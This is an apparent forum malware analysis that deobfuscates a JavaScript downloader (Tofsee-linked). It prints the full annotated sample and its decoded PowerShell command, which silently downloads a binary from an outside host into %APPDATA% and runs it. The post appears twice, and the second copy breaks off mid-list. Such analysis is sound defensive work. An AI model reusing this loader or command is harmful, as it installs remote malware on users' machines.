Malware Analysis Easy to deobfuscate - Cordelie.js - 3/ 53 - Oct,19 - #Tofsee js downloader

DardiM

From https://malwaretips.com/threads/19-10-2016-11.64615/
Thanks to @Der.Reisende


Why this sample ?

- Seems complicated, but in reality it is very easy to understand: Notepad++ alone is enough
- 3/53 detections on VirusTotal when posting
Antivirus scan for bed76304c264b1c8851143ca7dd63f406b823b8a3bcff4b7c8a959d37053a714 at 2016-10-19 15:39:42 UTC - VirusTotal
1) What it looks like :

// Junk helper: always returns undefined. Its only use is the guard
// `ybegbekhe() === 846` inside the switch further down, which can never be
// true, so everything behind that guard is dead padding.
function ybegbekhe() {
return undefined;
}
// Decoder regex #1 (used in yvedy()): every "ujixxu" filler token in the
// payload string becomes '^' (nlany) - the cmd.exe escape caret, which cmd
// strips before execution, so "po^W^e^RsheL^L" runs as powershell.
var tyfjepfef = /ujixxu/gi;

// Junk helper: defined but never called anywhere in this script.
function gicdoqnodhi() {

var sviladt = false;
return sviladt;
}
// Decoder regex #2 (used in yvedy()): "exozett" -> 'e' (ujcilf).
var hyqzuski = /exozett/gi;
// Replacement for decoder regex #3 (odacik, /ejewca/gi): 'c'.
var axucw = 'c';
// Replacement for decoder regex #2 (hyqzuski): 'e'.
var ujcilf = 'e';
// Method name looked up via bracket notation, jaqinod[hifenmuhz](...), so the
// literal ".replace(" never appears in the source.
var hifenmuhz = 'replace';
// `typeof lmesinpuhc == 'number'` is always true; it only guards junk code.
var lmesinpuhc = 1;
// Second argument of WScript.Shell.Run() below: the window style, 0 = hidden.
var fqopwytlu = 0;
// Host check: typeof document is "undefined" outside a browser, e.g. under
// Windows Script Host, which is where the ActiveXObject call below works.
var wlypnapidi = typeof document;
// Unused.
var ehigym = 0;
// `unynz === "ike"` is always true, but it is only tested inside dead code.
var unynz = 'ike';
// null == 0 is false in JavaScript, so the block guarded by `zcewobpe == 0` never runs.
var zcewobpe = null;
// Replacement for decoder regex #4 (jzehykli, /sipxuqm/gi): 'a'.
var ymidv = 'a';

// Junk helper: returns null; the guard `astyjyfog() == 'enebo'` is never true.
function astyjyfog() {

return null;
}
// Unused.
var arxugti = '75497';
// Replacement for decoder regex #1 (tyfjepfef, /ujixxu/gi): the caret that
// cmd.exe removes before running the command, used to split up keywords such
// as "powershell" in the decoded command line.
var nlany = '^';
// Unused.
var exmademojv = null;

// Junk helper: returns null. typeof null is 'object', so the check
// `typeof ymmakybkohn() == 'object'` would pass, but it sits inside dead code.
function ymmakybkohn() {

return null;
}
// Decoder regex #3 (used in yvedy()): "ejewca" -> 'c' (axucw).
var odacik = /ejewca/gi;
// `etuqmowuh == 168` is never true (undefined == 168 is false).
var etuqmowuh = undefined;
// Decoder regex #4 (used in yvedy()): "sipxuqm" -> 'a' (ymidv).
var jzehykli = /sipxuqm/gi;
// Only referenced from dead code.
var karuvysse = 'unissah';

// Returns null, so `xaskyfuz() === 90` is always false and the main if/else
// below always takes its else branch - the one that creates WScript.Shell.
function xaskyfuz() {

return null;
}
// Junk helper: defined but never called.
function taro() {

var bpitdarqa = null;
return bpitdarqa;
}
// Switch selector: always 77, so `switch (eqymfeg())` always enters `case 77:`.
function eqymfeg() {

return 77;
}
// Switch selector: always undefined, so the inner switch always lands on
// `case undefined:` - the only case that calls togultyku.run().
// (switch compares with ===, so `case null:` does not match undefined.)
function atseqne() {

var atepoho = undefined;
return atepoho;
}
// Builds the command line handed to WScript.Shell.Run().
// jaqinod is the real command with four filler tokens spliced in
// ("ujixxu", "ejewca", "exozett", "sipxuqm"); ekihvub removes them with four
// global, case-insensitive String.prototype.replace calls, mapping them to
// '^', 'c', 'e' and 'a' respectively. The decoded string is a cmd.exe /c line
// that starts PowerShell (-ExecutionPolicy Bypass, -NoProfile, hidden window),
// downloads a file over HTTP with System.Net.WebClient.DownloadFile into
// %APPDATA% and launches it with Start-Process - see the analysis below.
// The download URL is embedded in this string; it is the indicator to extract.
// For detection the decoded command line (wscript -> cmd -> powershell with
// these switches) is the observable, not the obfuscated source text.
function yvedy() {

var jaqinod = "ejewcamd.exozettxexozett /ejewca poujixxuWujixxuexozettujixxuRshexozettLujixxuL.exozettXexozett ujixxu-ujixxuexozettxexozettejewcaujixxuutIoujixxunPoujixxuLIejewcaY ujixxubypsipxuqmujixxusujixxuS -ujixxunujixxuoPrujixxuoFiujixxuLexozett -WinujixxudOWsujixxutujixxuYujixxulexozett hujixxuiujixxuDDujixxuexozettNujixxu ujixxu(nexozettW-oBJexozettujixxuejewcaujixxutujixxu ujixxuSysujixxutexozettujixxuMujixxu.nexozettujixxuTujixxu.ujixxuWexozettujixxubujixxuejewcaLIexozettNTujixxu)ujixxu.doWNujixxulOujixxusipxuqmujixxudFujixxuIujixxulujixxuexozett('http: //lovexozett.nexozettwsexozettxgirls.ru/js/boxun4.bin','%sipxuqmPPDsipxuqmTsipxuqm%.exozettxexozett');STsipxuqmRt-PujixxurujixxuoujixxuejewcaexozettSujixxuSujixxu ujixxu%sipxuqmpPdsipxuqmtsipxuqm%.exozettXexozett";
// Four chained replaces; the order does not matter because the tokens do not overlap.
var ekihvub = jaqinod[hifenmuhz](tyfjepfef, nlany)[hifenmuhz](odacik, axucw)[hifenmuhz](hyqzuski, ujcilf)[hifenmuhz](jzehykli, ymidv);
return ekihvub;
}
// Main dispatch. xaskyfuz() returns null, so this condition is never true and
// the whole if-body (everything up to the matching `} else {`) is dead padding.
if (xaskyfuz() === 90) {

var ispegibnys = 2.248;
// Junk: 2.248 === 10.248 is false.
if (ispegibnys === 10.248) {

var uhqavzobim = '88685';
var relifr = "76930";
var ehujets = 822;
var objymtudyms = ehujets + relifr;
objymtudyms = 'epupad' + objymtudyms;
hazufzyhbu = 36;
var qtynal = karuvysse + hazufzyhbu;
qtynal = qtynal + 41.73;
var nafxyjwypqy = typeof null;
var eduzsikj = 'msynro' + 42;
var iguporfucf = "ewzo";
var lzafhig = '29737' + 431;
}
// Junk: the condition is true, but the enclosing branch is dead.
if (unynz === "ike") {

var aqqoku = typeof null;
var ranudde = 'mnysde';
var uhnicjomsesg = 97;
var yvcuviz = ranudde + uhnicjomsesg;
var ezyri = typeof 23.7059;
var abujuk = typeof 1.5;
var didkiraca = 47.945 + 'jgyk';
}
// Junk: null == 0 is false.
if (zcewobpe == 0) {

if (typeof ymmakybkohn() == 'object') {
var zyhotb = 41 + "24653";
qjatofyv = "acjexu";
bojyhogi = 24.8;
var ixaggatga = bojyhogi + qjatofyv;
}
}
// Junk: astyjyfog() returns null.
if (astyjyfog() == 'enebo') {

gmaser = 6 + "11463";
var sqomatoxh = typeof 1;
var verajej = 6;
var gawduhe = 'edizx';
var ymopiwolb = "opyzvo" + 23.505;
}
} else {
// Always executed. ActiveXObject / WScript.Shell is a Windows Script Host
// API, so the script is meant to be run by wscript.exe or cscript.exe.
var togultyku = new ActiveXObject("WScript.Shell");
// eqymfeg() is a constant 77: only `case 77:` is live.
switch (eqymfeg()) {
case '74904':

// Dead: the string '74904' never matches 77.
if (etuqmowuh == 168) {
var bqylholl = null;
}
break;
case 77:

// True under Windows Script Host (no DOM), so the inner switch runs.
if (wlypnapidi == "undefined") {
// atseqne() is a constant undefined: only `case undefined:` is live.
switch (atseqne()) {
case null:
// Dead: switch uses strict equality and null !== undefined. The true,
// 'orjop' and false cases below repeat this same junk body verbatim;
// `jzolypif == null` is never true because jzolypif is a non-empty string.
var jzolypif = "ymuho";
if (jzolypif == null) {

if (ybegbekhe() === 846) {
var vurpoqwigu = "abide";
vurpoqwigu = 5;
var ivuzudxadd = 'riruvq';
}
}
if (typeof lmesinpuhc == 'number') {

var anedduzqe = 82 + "mykjite";
var ibrura = typeof undefined;
var bnufolqojri = 67.81 + "15488";
cazbojwis = 143.0458 + '26086';
var apneverco = typeof false;
}
break;
case true:

var jzolypif = "ymuho";
if (jzolypif == null) {

if (ybegbekhe() === 846) {
var vurpoqwigu = "abide";
vurpoqwigu = 5;
var ivuzudxadd = 'riruvq';
}
}
if (typeof lmesinpuhc == 'number') {

var anedduzqe = 82 + "mykjite";
var ibrura = typeof undefined;
var bnufolqojri = 67.81 + "15488";
cazbojwis = 143.0458 + '26086';
var apneverco = typeof false;
}
break;
case 'orjop':

var jzolypif = "ymuho";
if (jzolypif == null) {

if (ybegbekhe() === 846) {
var vurpoqwigu = "abide";
vurpoqwigu = 5;
var ivuzudxadd = 'riruvq';
}
}
if (typeof lmesinpuhc == 'number') {

var anedduzqe = 82 + "mykjite";
var ibrura = typeof undefined;
var bnufolqojri = 67.81 + "15488";
cazbojwis = 143.0458 + '26086';
var apneverco = typeof false;
}
break;
case false:

var jzolypif = "ymuho";
if (jzolypif == null) {

if (ybegbekhe() === 846) {
var vurpoqwigu = "abide";
vurpoqwigu = 5;
var ivuzudxadd = 'riruvq';
}
}
if (typeof lmesinpuhc == 'number') {

var anedduzqe = 82 + "mykjite";
var ibrura = typeof undefined;
var bnufolqojri = 67.81 + "15488";
cazbojwis = 143.0458 + '26086';
var apneverco = typeof false;
}
break;
case undefined:
// The payload. Runs the decoded "cmd.exe /c ... powershell ..." line from
// yvedy(); fqopwytlu (0) is the window style, so the console stays hidden.
// Observable behaviour for detection: wscript.exe spawning cmd.exe ->
// powershell.exe with -ExecutionPolicy Bypass / -WindowStyle Hidden, an
// HTTP download into %APPDATA% and Start-Process of the dropped file.
togultyku.run(yvedy(), fqopwytlu);
break;
}
}
var jnyten = 119.6088 + "cferm";
break;
}
// Trailing junk; the assignments without `var` (topofawte, ehactepty) create
// implicit globals that nothing reads.
var fewavd = typeof undefined;
topofawte = "lsonorin" + 11.926;
var edfyvo = 10 + 'mavetzaqh';
var jadizdopwi = "erti" + 96;
var evimoss = 59.2507;
var kyqvolvid = '47409';
var tmatqavyra = 5.008;
ehactepty = tmatqavyra + kyqvolvid;
ehactepty = ehactepty + 3;

}

2) Analysis :

The part in the spoiler seems difficult to understand, but it is really easy to defeat.
2-1) First, a quick look at the script :

case undefined:
togultyku.run(yvedy(), fqopwytlu);
break;
=> oh, a run part :cool:

We can see in the script :

var togultyku = new ActiveXObject("WScript.Shell");
Let's find both parameters:
- var fqopwytlu = 0;

- yvedy() :
function yvedy() {
var jaqinod = "ejewcamd.exozettxexozett /ejewca poujixxuWujixxuexozettujixxuRshexozettLujixxuL.exozettXexozett ujixxu-ujixxuexozettxexozettejewcaujixxuutIoujixxunPoujixxuLIejewcaY ujixxubypsipxuqmujixxusujixxuS -ujixxunujixxuoPrujixxuoFiujixxuLexozett -WinujixxudOWsujixxutujixxuYujixxulexozett hujixxuiujixxuDDujixxuexozettNujixxu ujixxu(nexozettW-oBJexozettujixxuejewcaujixxutujixxu ujixxuSysujixxutexozettujixxuMujixxu.nexozettujixxuTujixxu.ujixxuWexozettujixxubujixxuejewcaLIexozettNTujixxu)ujixxu.doWNujixxulOujixxusipxuqmujixxudFujixxuIujixxulujixxuexozett('http://lovexozett.nexozettwsexozett...ixxurujixxuoujixxuejewcaexozettSujixxuSujixxu ujixxu%sipxuqmpPdsipxuqmtsipxuqm%.exozettXexozett";

var ekihvub = jaqinod[hifenmuhz](tyfjepfef, nlany)[hifenmuhz](odacik, axucw)[hifenmuhz](hyqzuski, ujcilf)[hifenmuhz](jzehykli, ymidv);
return ekihvub;
}

This function returns ekihvub, a value derived from jaqinod, a string with "strange" content :D

var ekihvub = jaqinod[hifenmuhz](tyfjepfef, nlany)[hifenmuhz](odacik, axucw)[hifenmuhz](hyqzuski, ujcilf)[hifenmuhz](jzehykli, ymidv);

These are string manipulations.
With the variable names and the content of the script, the real values are easy to retrieve:
hifenmuhz = 'replace';
var tyfjepfef =
/ujixxu/gi;
var nlany =
'^';

var odacik = /ejewca/gi;
var axucw =
'c';

var hyqzuski =
/exozett/gi;
var ujcilf =
'e';

var jzehykli =
/sipxuqm/gi;
var ymidv =
'a';

var etuqmowuh =
undefined;
var ekihvub = jaqinod['replace'](/ujixxu/gi, '^')['replace'](/ejewca/gi, 'c')['replace'](/exozett/gi, 'e')['replace'](/sipxuqm/gi, 'a');
So, several "replace" calls are used to clean the obfuscated string in jaqinod

Result :

"cmd.exe /c po^W^e^RsheL^L.eXe ^-^exec^utIo^nPo^LIcY ^bypa^s^S -^n^oPr^oFi^Le -Win^dOWs^t^Y^le h^i^DD^eN^ ^(neW-oBJe^c^t^ ^Sys^te^M^.ne^T^.^We^b^cLIeNT^)"
Once cmd.exe strips the '^' escape characters, it is easy to understand:
"cmd.exe /cpoWeRsheLL.eXe -executIonPoLIcY bypasS -noProFiLe -WindOWstYle hiDDeN (neW-oBJect SysteM.neT.WebcLIeNT).doWNlOadFIle('http ://love.newsexgirls.ru/js/boxun4.bin','%APPDATA%\exe');STaRt-ProceSS %APPDATA%\eXe "
2-2) Let's see the way it works, from the beginning:

We can see in the content that function declarations and vars are mixed.
We will follow the actual execution path:

var tyfjepfef = /ujixxu/gi;
var hyqzuski = /exozett/gi;
var axucw = 'c';
var ujcilf = 'e';
var hifenmuhz = 'replace';
var lmesinpuhc = 1;
var fqopwytlu = 0;
var wlypnapidi = typeof document;
var ehigym = 0;
var unynz = 'ike';
var zcewobpe = null;
var ymidv = 'a';
var arxugti = '75497';
var nlany = '^';
var exmademojv = null;
var odacik = /ejewca/gi;
var etuqmowuh = undefined;
var jzehykli = /sipxuqm/gi;
var karuvysse = 'unissah';


if (xaskyfuz() === 90) {
=> function xaskyfuz() {
return null;
}
var ispegibnys = 2.248;
if (ispegibnys === 10.248) {

else
var togultyku = new ActiveXObject("WScript.Shell"); IMPORTANT !
switch (eqymfeg()) {
=> function eqymfeg() {
return 77;
}
case '74904':
if (etuqmowuh == 168) {
var bqylholl = null;
}
break;
case 77:
if (wlypnapidi == "undefined") {

=> var wlypnapidi = typeof document;
=> always "undefined" when the script is not running in a browser!
switch (atseqne()) {
=> function atseqne() {
var atepoho = undefined;
return atepoho;
}
case null:...
...

here, multiple case:
...
...

case undefined:
togultyku.run(yvedy(), fqopwytlu);

=> the function we have seen in "2-1) First, a quick look at the script :"

=> run :
"cmd.exe /c po^W^e^RsheL^L.eXe ^-^exec^utIo^nPo^LIcY ^bypa^s^S -^n^oPr^oFi^Le -Win^dOWs^t^Y^le h^i^DD^eN^ ^(neW-oBJe^c^t^ ^Sys^te^M^.ne^T^.^We^b^cLIeNT^)"
break;
}

3) Explanation of the command :

- powershell.exe is run and interprets the real content:
poWeRsheLL.eXe -executIonPoLIcY bypasS -noProFiLe -WindOWstYle hiDDeN (neW-oBJect SysteM.neT.WebcLIeNT).doWNlOadFIle('http ://love.newsexgirls.ru/js/boxun4.bin','%APPDATA%\exe');STaRt-ProceSS %APPDATA%\eXe

- object System.net.Webclient is created

- its method downloadFile(parameter1, parameter2) is used

- parameter1 : URL from where to download the payload
- parameter2 : the path + name to be used for the payload
- Start-Process %APPDATA%\eXe : runs the payload

URL :


http ://love.newsexgirls.ru/js/boxun4.bin
END :)

----------------------------------------------------------------------------------------------------------------------
Want to see an elaborate script?! Don't forget this one (see both parts):
https://malwaretips.com/threads/deo...-oct-17-elaborate-methods-used-updated.64575/
 

Der.Reisende

From https://malwaretips.com/threads/19-10-2016-11.64615/
Thanks to @Der.Reisende


Why this sample ?

- Seems very obfuscated, with complicated parts, but in reality it is very easy: Notepad++ alone is enough
- 3/53 detections on VirusTotal when posting
Antivirus scan for bed76304c264b1c8851143ca7dd63f406b823b8a3bcff4b7c8a959d37053a714 at 2016-10-19 15:39:42 UTC - VirusTotal
1) What it looks like :

// Junk helper: always returns undefined. Its only use is the guard
// `ybegbekhe() === 846` inside the switch further down, which can never be
// true, so everything behind that guard is dead padding.
function ybegbekhe() {
return undefined;
}
// Decoder regex #1 (used in yvedy()): every "ujixxu" filler token in the
// payload string becomes '^' (nlany) - the cmd.exe escape caret, which cmd
// strips before execution, so "po^W^e^RsheL^L" runs as powershell.
var tyfjepfef = /ujixxu/gi;

// Junk helper: defined but never called anywhere in this script.
function gicdoqnodhi() {

var sviladt = false;
return sviladt;
}
// Decoder regex #2 (used in yvedy()): "exozett" -> 'e' (ujcilf).
var hyqzuski = /exozett/gi;
// Replacement for decoder regex #3 (odacik, /ejewca/gi): 'c'.
var axucw = 'c';
// Replacement for decoder regex #2 (hyqzuski): 'e'.
var ujcilf = 'e';
// Method name looked up via bracket notation, jaqinod[hifenmuhz](...), so the
// literal ".replace(" never appears in the source.
var hifenmuhz = 'replace';
// `typeof lmesinpuhc == 'number'` is always true; it only guards junk code.
var lmesinpuhc = 1;
// Second argument of WScript.Shell.Run() below: the window style, 0 = hidden.
var fqopwytlu = 0;
// Host check: typeof document is "undefined" outside a browser, e.g. under
// Windows Script Host, which is where the ActiveXObject call below works.
var wlypnapidi = typeof document;
// Unused.
var ehigym = 0;
// `unynz === "ike"` is always true, but it is only tested inside dead code.
var unynz = 'ike';
// null == 0 is false in JavaScript, so the block guarded by `zcewobpe == 0` never runs.
var zcewobpe = null;
// Replacement for decoder regex #4 (jzehykli, /sipxuqm/gi): 'a'.
var ymidv = 'a';

// Junk helper: returns null; the guard `astyjyfog() == 'enebo'` is never true.
function astyjyfog() {

return null;
}
// Unused.
var arxugti = '75497';
// Replacement for decoder regex #1 (tyfjepfef, /ujixxu/gi): the caret that
// cmd.exe removes before running the command, used to split up keywords such
// as "powershell" in the decoded command line.
var nlany = '^';
// Unused.
var exmademojv = null;

// Junk helper: returns null. typeof null is 'object', so the check
// `typeof ymmakybkohn() == 'object'` would pass, but it sits inside dead code.
function ymmakybkohn() {

return null;
}
// Decoder regex #3 (used in yvedy()): "ejewca" -> 'c' (axucw).
var odacik = /ejewca/gi;
// `etuqmowuh == 168` is never true (undefined == 168 is false).
var etuqmowuh = undefined;
// Decoder regex #4 (used in yvedy()): "sipxuqm" -> 'a' (ymidv).
var jzehykli = /sipxuqm/gi;
// Only referenced from dead code.
var karuvysse = 'unissah';

// Returns null, so `xaskyfuz() === 90` is always false and the main if/else
// below always takes its else branch - the one that creates WScript.Shell.
function xaskyfuz() {

return null;
}
// Junk helper: defined but never called.
function taro() {

var bpitdarqa = null;
return bpitdarqa;
}
// Switch selector: always 77, so `switch (eqymfeg())` always enters `case 77:`.
function eqymfeg() {

return 77;
}
// Switch selector: always undefined, so the inner switch always lands on
// `case undefined:` - the only case that calls togultyku.run().
// (switch compares with ===, so `case null:` does not match undefined.)
function atseqne() {

var atepoho = undefined;
return atepoho;
}
// Builds the command line handed to WScript.Shell.Run().
// jaqinod is the real command with four filler tokens spliced in
// ("ujixxu", "ejewca", "exozett", "sipxuqm"); ekihvub removes them with four
// global, case-insensitive String.prototype.replace calls, mapping them to
// '^', 'c', 'e' and 'a' respectively. The decoded string is a cmd.exe /c line
// that starts PowerShell (-ExecutionPolicy Bypass, -NoProfile, hidden window),
// downloads a file over HTTP with System.Net.WebClient.DownloadFile into
// %APPDATA% and launches it with Start-Process - see the analysis below.
// The download URL is embedded in this string; it is the indicator to extract.
// For detection the decoded command line (wscript -> cmd -> powershell with
// these switches) is the observable, not the obfuscated source text.
function yvedy() {

var jaqinod = "ejewcamd.exozettxexozett /ejewca poujixxuWujixxuexozettujixxuRshexozettLujixxuL.exozettXexozett ujixxu-ujixxuexozettxexozettejewcaujixxuutIoujixxunPoujixxuLIejewcaY ujixxubypsipxuqmujixxusujixxuS -ujixxunujixxuoPrujixxuoFiujixxuLexozett -WinujixxudOWsujixxutujixxuYujixxulexozett hujixxuiujixxuDDujixxuexozettNujixxu ujixxu(nexozettW-oBJexozettujixxuejewcaujixxutujixxu ujixxuSysujixxutexozettujixxuMujixxu.nexozettujixxuTujixxu.ujixxuWexozettujixxubujixxuejewcaLIexozettNTujixxu)ujixxu.doWNujixxulOujixxusipxuqmujixxudFujixxuIujixxulujixxuexozett('http: //lovexozett.nexozettwsexozettxgirls.ru/js/boxun4.bin','%sipxuqmPPDsipxuqmTsipxuqm%.exozettxexozett');STsipxuqmRt-PujixxurujixxuoujixxuejewcaexozettSujixxuSujixxu ujixxu%sipxuqmpPdsipxuqmtsipxuqm%.exozettXexozett";
// Four chained replaces; the order does not matter because the tokens do not overlap.
var ekihvub = jaqinod[hifenmuhz](tyfjepfef, nlany)[hifenmuhz](odacik, axucw)[hifenmuhz](hyqzuski, ujcilf)[hifenmuhz](jzehykli, ymidv);
return ekihvub;
}
// Main dispatch. xaskyfuz() returns null, so this condition is never true and
// the whole if-body (everything up to the matching `} else {`) is dead padding.
if (xaskyfuz() === 90) {

var ispegibnys = 2.248;
// Junk: 2.248 === 10.248 is false.
if (ispegibnys === 10.248) {

var uhqavzobim = '88685';
var relifr = "76930";
var ehujets = 822;
var objymtudyms = ehujets + relifr;
objymtudyms = 'epupad' + objymtudyms;
hazufzyhbu = 36;
var qtynal = karuvysse + hazufzyhbu;
qtynal = qtynal + 41.73;
var nafxyjwypqy = typeof null;
var eduzsikj = 'msynro' + 42;
var iguporfucf = "ewzo";
var lzafhig = '29737' + 431;
}
// Junk: the condition is true, but the enclosing branch is dead.
if (unynz === "ike") {

var aqqoku = typeof null;
var ranudde = 'mnysde';
var uhnicjomsesg = 97;
var yvcuviz = ranudde + uhnicjomsesg;
var ezyri = typeof 23.7059;
var abujuk = typeof 1.5;
var didkiraca = 47.945 + 'jgyk';
}
// Junk: null == 0 is false.
if (zcewobpe == 0) {

if (typeof ymmakybkohn() == 'object') {
var zyhotb = 41 + "24653";
qjatofyv = "acjexu";
bojyhogi = 24.8;
var ixaggatga = bojyhogi + qjatofyv;
}
}
// Junk: astyjyfog() returns null.
if (astyjyfog() == 'enebo') {

gmaser = 6 + "11463";
var sqomatoxh = typeof 1;
var verajej = 6;
var gawduhe = 'edizx';
var ymopiwolb = "opyzvo" + 23.505;
}
} else {
// Always executed. ActiveXObject / WScript.Shell is a Windows Script Host
// API, so the script is meant to be run by wscript.exe or cscript.exe.
var togultyku = new ActiveXObject("WScript.Shell");
// eqymfeg() is a constant 77: only `case 77:` is live.
switch (eqymfeg()) {
case '74904':

// Dead: the string '74904' never matches 77.
if (etuqmowuh == 168) {
var bqylholl = null;
}
break;
case 77:

// True under Windows Script Host (no DOM), so the inner switch runs.
if (wlypnapidi == "undefined") {
// atseqne() is a constant undefined: only `case undefined:` is live.
switch (atseqne()) {
case null:
// Dead: switch uses strict equality and null !== undefined. The true,
// 'orjop' and false cases below repeat this same junk body verbatim;
// `jzolypif == null` is never true because jzolypif is a non-empty string.
var jzolypif = "ymuho";
if (jzolypif == null) {

if (ybegbekhe() === 846) {
var vurpoqwigu = "abide";
vurpoqwigu = 5;
var ivuzudxadd = 'riruvq';
}
}
if (typeof lmesinpuhc == 'number') {

var anedduzqe = 82 + "mykjite";
var ibrura = typeof undefined;
var bnufolqojri = 67.81 + "15488";
cazbojwis = 143.0458 + '26086';
var apneverco = typeof false;
}
break;
case true:

var jzolypif = "ymuho";
if (jzolypif == null) {

if (ybegbekhe() === 846) {
var vurpoqwigu = "abide";
vurpoqwigu = 5;
var ivuzudxadd = 'riruvq';
}
}
if (typeof lmesinpuhc == 'number') {

var anedduzqe = 82 + "mykjite";
var ibrura = typeof undefined;
var bnufolqojri = 67.81 + "15488";
cazbojwis = 143.0458 + '26086';
var apneverco = typeof false;
}
break;
case 'orjop':

var jzolypif = "ymuho";
if (jzolypif == null) {

if (ybegbekhe() === 846) {
var vurpoqwigu = "abide";
vurpoqwigu = 5;
var ivuzudxadd = 'riruvq';
}
}
if (typeof lmesinpuhc == 'number') {

var anedduzqe = 82 + "mykjite";
var ibrura = typeof undefined;
var bnufolqojri = 67.81 + "15488";
cazbojwis = 143.0458 + '26086';
var apneverco = typeof false;
}
break;
case false:

var jzolypif = "ymuho";
if (jzolypif == null) {

if (ybegbekhe() === 846) {
var vurpoqwigu = "abide";
vurpoqwigu = 5;
var ivuzudxadd = 'riruvq';
}
}
if (typeof lmesinpuhc == 'number') {

var anedduzqe = 82 + "mykjite";
var ibrura = typeof undefined;
var bnufolqojri = 67.81 + "15488";
cazbojwis = 143.0458 + '26086';
var apneverco = typeof false;
}
break;
case undefined:
// The payload. Runs the decoded "cmd.exe /c ... powershell ..." line from
// yvedy(); fqopwytlu (0) is the window style, so the console stays hidden.
// Observable behaviour for detection: wscript.exe spawning cmd.exe ->
// powershell.exe with -ExecutionPolicy Bypass / -WindowStyle Hidden, an
// HTTP download into %APPDATA% and Start-Process of the dropped file.
togultyku.run(yvedy(), fqopwytlu);
break;
}
}
var jnyten = 119.6088 + "cferm";
break;
}
// Trailing junk; the assignments without `var` (topofawte, ehactepty) create
// implicit globals that nothing reads.
var fewavd = typeof undefined;
topofawte = "lsonorin" + 11.926;
var edfyvo = 10 + 'mavetzaqh';
var jadizdopwi = "erti" + 96;
var evimoss = 59.2507;
var kyqvolvid = '47409';
var tmatqavyra = 5.008;
ehactepty = tmatqavyra + kyqvolvid;
ehactepty = ehactepty + 3;

}

2) Analysis :

The part in the spoiler seems difficult to understand, but it is really easy to defeat.
2-1) First, a quick look at the script :

case undefined:
togultyku.run(yvedy(), fqopwytlu);
break;
=> oh, a run part :cool:

We can see in the script :

var togultyku = new ActiveXObject("WScript.Shell");
Let's find both parameters:
- var fqopwytlu = 0;

- yvedy() :
function yvedy() {
var jaqinod = "ejewcamd.exozettxexozett /ejewca poujixxuWujixxuexozettujixxuRshexozettLujixxuL.exozettXexozett ujixxu-ujixxuexozettxexozettejewcaujixxuutIoujixxunPoujixxuLIejewcaY ujixxubypsipxuqmujixxusujixxuS -ujixxunujixxuoPrujixxuoFiujixxuLexozett -WinujixxudOWsujixxutujixxuYujixxulexozett hujixxuiujixxuDDujixxuexozettNujixxu ujixxu(nexozettW-oBJexozettujixxuejewcaujixxutujixxu ujixxuSysujixxutexozettujixxuMujixxu.nexozettujixxuTujixxu.ujixxuWexozettujixxubujixxuejewcaLIexozettNTujixxu)ujixxu.doWNujixxulOujixxusipxuqmujixxudFujixxuIujixxulujixxuexozett('http://lovexozett.nexozettwsexozett...ixxurujixxuoujixxuejewcaexozettSujixxuSujixxu ujixxu%sipxuqmpPdsipxuqmtsipxuqm%.exozettXexozett";

var ekihvub = jaqinod[hifenmuhz](tyfjepfef, nlany)[hifenmuhz](odacik, axucw)[hifenmuhz](hyqzuski, ujcilf)[hifenmuhz](jzehykli, ymidv);
return ekihvub;
}

This function returns ekihvub, a value derived from jaqinod, a string with "strange" content :D

var ekihvub = jaqinod[hifenmuhz](tyfjepfef, nlany)[hifenmuhz](odacik, axucw)[hifenmuhz](hyqzuski, ujcilf)[hifenmuhz](jzehykli, ymidv);

These are string manipulations.
With the variable names and the content of the script, the real values are easy to retrieve:
hifenmuhz = 'replace';
var tyfjepfef =
/ujixxu/gi;
var nlany =
'^';

var odacik = /ejewca/gi;
var axucw =
'c';

var hyqzuski =
/exozett/gi;
var ujcilf =
'e';

var jzehykli =
/sipxuqm/gi;
var ymidv =
'a';

var etuqmowuh =
undefined;
var ekihvub = jaqinod['replace'](/ujixxu/gi, '^')['replace'](/ejewca/gi, 'c')['replace'](/exozett/gi, 'e')['replace'](/sipxuqm/gi, 'a');
So, several "replace" calls are used to clean the obfuscated string in jaqinod

Result :

"cmd.exe /c po^W^e^RsheL^L.eXe ^-^exec^utIo^nPo^LIcY ^bypa^s^S -^n^oPr^oFi^Le -Win^dOWs^t^Y^le h^i^DD^eN^ ^(neW-oBJe^c^t^ ^Sys^te^M^.ne^T^.^We^b^cLIeNT^)"
Once cmd.exe strips the '^' escape characters, it is easy to understand:
"cmd.exe /cpoWeRsheLL.eXe -executIonPoLIcY bypasS -noProFiLe -WindOWstYle hiDDeN (neW-oBJect SysteM.neT.WebcLIeNT).doWNlOadFIle('http ://love.newsexgirls.ru/js/boxun4.bin','%APPDATA%\exe');STaRt-ProceSS %APPDATA%\eXe "
2-2) Let's see the way it works, from the beginning:

We can see in the content that function declarations and vars are mixed.
We will follow the actual execution path:

var tyfjepfef = /ujixxu/gi;
var hyqzuski = /exozett/gi;
var axucw = 'c';
var ujcilf = 'e';
var hifenmuhz = 'replace';
var lmesinpuhc = 1;
var fqopwytlu = 0;
var wlypnapidi = typeof document;
var ehigym = 0;
var unynz = 'ike';
var zcewobpe = null;
var ymidv = 'a';
var arxugti = '75497';
var nlany = '^';
var exmademojv = null;
var odacik = /ejewca/gi;
var etuqmowuh = undefined;
var jzehykli = /sipxuqm/gi;
var karuvysse = 'unissah';


if (xaskyfuz() === 90) {
=> function xaskyfuz() {
return null;
}
var ispegibnys = 2.248;
if (ispegibnys === 10.248) {

else
var togultyku = new ActiveXObject("WScript.Shell"); IMPORTANT !
switch (eqymfeg()) {
=> function eqymfeg() {
return 77;
}
case '74904':
if (etuqmowuh == 168) {
var bqylholl = null;
}
break;
case 77:
if (wlypnapidi == "undefined") {

=> var wlypnapidi = typeof document;
=> always "undefined" when the script is not running in a browser!
switch (atseqne()) {
=> function atseqne() {
var atepoho = undefined;
return atepoho;
}
case null:...
...

here, multiple case:
...
...

case undefined:
togultyku.run(yvedy(), fqopwytlu);

=> the function we have seen in "2-1) First, a quick look at the script :"

=> run :
"cmd.exe /c po^W^e^RsheL^L.eXe ^-^exec^utIo^nPo^LIcY ^bypa^s^S -^n^oPr^oFi^Le -Win^dOWs^t^Y^le h^i^DD^eN^ ^(neW-oBJe^c^t^ ^Sys^te^M^.ne^T^.^We^b^cLIeNT^)"
break;
}

3) Explanation of the command :

- powershell.exe is run and interprets the real content:
poWeRsheLL.eXe -executIonPoLIcY bypasS -noProFiLe -WindOWstYle hiDDeN (neW-oBJect SysteM.neT.WebcLIeNT).doWNlOadFIle('http ://love.newsexgirls.ru/js/boxun4.bin','%APPDATA%\exe');STaRt-ProceSS %APPDATA%\eXe

- object System.net.Webclient is created

- its method downloadFile(parameter1, parameter2) is used

- parameter1 : URL from where to download the payload
